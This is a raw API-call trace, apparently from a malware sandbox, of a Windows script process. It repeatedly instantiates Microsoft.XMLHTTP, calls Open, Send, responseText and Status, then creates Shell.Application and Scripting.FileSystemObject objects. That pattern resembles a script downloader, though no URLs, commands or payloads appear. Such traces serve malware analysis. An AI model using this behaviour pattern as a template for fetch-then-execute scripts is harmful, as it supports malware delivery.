	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.627] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0708.627] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0708.627] ??2@YAPEAX_K@Z () returned 0x62f310
	[0708.627] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.627] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0708.628] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0708.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.628] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.628] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.628] SysStringLen (param_1=0x0) returned 0x0
	[0708.628] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0708.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.628] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0708.628] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0708.628] ??2@YAPEAX_K@Z () returned 0x62f330
	[0708.628] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0708.628] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.628] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0708.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0708.629] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0708.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.629] longjmp () 
	[0708.629] longjmp () 
	[0708.629] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.629] SysStringLen (param_1=0x0) returned 0x0
	[0708.629] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0708.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.630] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0708.630] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0708.630] ??2@YAPEAX_K@Z () returned 0x62f310
	[0708.630] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0708.630] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.630] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0708.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0708.630] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0708.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.630] longjmp () 
	[0708.630] longjmp () 
	[0708.631] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.631] SysStringLen (param_1=0x0) returned 0x0
	[0708.631] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0708.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.631] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0708.631] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0708.631] ??2@YAPEAX_K@Z () returned 0x62f330
	[0708.631] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0708.631] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.631] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0708.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0708.631] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0708.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.631] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.632] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0708.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0712.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0712.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0712.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0712.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0712.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0712.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0712.032] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0712.032] SysStringLen (param_1=0x0) returned 0x0
	[0712.032] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0712.032] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0712.032] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0712.032] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0712.032] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0712.032] ??2@YAPEAX_K@Z () returned 0x62f350
	[0712.032] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0712.032] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0712.032] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0712.032] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0712.033] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0712.033] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0712.033] SysStringLen (param_1=0x0) returned 0x0
	[0712.033] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0712.036] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0712.037] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0712.037] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0712.037] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0712.037] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0712.037] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0714.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0714.780] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0714.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0714.781] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.781] SysStringLen (param_1=0x0) returned 0x0
	[0714.782] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
